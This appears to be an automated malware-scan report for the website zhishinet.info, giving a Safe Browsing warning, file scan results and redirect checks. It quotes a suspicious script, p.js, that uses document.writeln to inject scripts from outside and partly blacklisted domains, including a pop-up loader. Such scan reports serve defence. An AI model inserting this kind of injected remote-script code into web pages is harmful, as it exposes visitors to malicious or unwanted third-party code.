Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=zhishinet.info
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://zhishinet.info/ | 200 OK Content-Length: 23035 Content-Type: text/html | clean |
http://zhishinet.info/forumdata/cache/common.js?KvX | 200 OK Content-Length: 58892 Content-Type: application/x-javascript | clean |
http://zhishinet.info/top4.js | 200 OK Content-Length: 93 Content-Type: application/x-javascript | clean |
http://zhishinet.info/include/js/slide.js | 200 OK Content-Length: 5432 Content-Type: application/x-javascript | clean |
http://zhishinet.info/top5.js | 200 OK Content-Length: 93 Content-Type: application/x-javascript | clean |
http://zhishinet.info/p.js | 200 OK Content-Length: 683 Content-Type: application/x-javascript | suspicious |
Page code contains blacklisted domain: js.shiwt.com document.writeln("<script src=\"http:\/\/js.shiwt.com\/110.js\"><\/script>");
r = 2; var seed = Math.random(); rnd = Math.ceil(seed * r); switch (rnd) { case 1: document.writeln('<script src="http://js.a3p4.com/page/?s=216895"></script>'); break; case 2: document.writeln('<script src="http://js.a3p4.com/page/?s=216895"></script>'); default: break; } document.writeln("<script src=\"http:\/\/f2.tbjfw.com\/code\/pop_cpf.asp?pid=103593\" charset=\"gb2312\"><\/script>"); document.writeln("<script charset=gb2312 src=\"http:\/\/v.wqzyt.net\/showpage2.asp?u=11691\"><\/script>") | ||
http://js.users.51.la/11561.js | 200 OK Content-Length: 1973 Content-Type: application/x-javascript | clean |
http://zhishinet.info/index.php | 200 OK Content-Length: 23035 Content-Type: text/html | clean |
http://zhishinet.info/register9.php | 200 OK Content-Length: 9861 Content-Type: text/html | clean |
http://zhishinet.info/logging.php?action=login | 200 OK Content-Length: 10599 Content-Type: text/html | clean |
http://zhishinet.info/forumdata/cache/md5.js?KvX | 200 OK Content-Length: 4730 Content-Type: application/x-javascript | clean |
http://zhishinet.info/search.php | 200 OK Content-Length: 10855 Content-Type: text/html | clean |
http://zhishinet.info/faq.php | 200 OK Content-Length: 10427 Content-Type: text/html | clean |
http://zhishinet.info/misc.php?action=nav | 200 OK Content-Length: 9192 Content-Type: text/html | clean |
http://zhishinet.info/pm.php?filter=newpm | 200 OK Content-Length: 7770 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: zhishinet.info
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 16 Jan 2015 09:06:31 GMT
Server: nginx
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: g6J_lastrequest=d0b2%2FFPLAlKBH%2BAaqPo1EbmU2C3jmx4m3QR4djjTZB1KZFDryoOk; expires=Tue, 10-Feb-2060 04:59:42 GMT; path=/; httponly
Set-Cookie: g6J_sid=51SSw8; expires=Fri, 23-Jan-2015 09:06:31 GMT; path=/; httponly
X-Powered-By: PHP/5.2.17p1
GET / HTTP/1.1
Host: zhishinet.info
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 16 Jan 2015 09:06:31 GMT
Server: nginx
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: g6J_lastrequest=d0b2%2FFPLAlKBH%2BAaqPo1EbmU2C3jmx4m3QR4djjTZB1KZFDryoOk; expires=Tue, 10-Feb-2060 04:59:42 GMT; path=/; httponly
Set-Cookie: g6J_sid=51SSw8; expires=Fri, 23-Jan-2015 09:06:31 GMT; path=/; httponly
X-Powered-By: PHP/5.2.17p1
Second query (visit from search engine):
GET / HTTP/1.1
Host: zhishinet.info
Referer: http://www.google.com/search?q=zhishinet.info
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: zhishinet.info
Referer: http://www.google.com/search?q=zhishinet.info
Result:
The result is similar to the first query. There are no suspicious redirects found.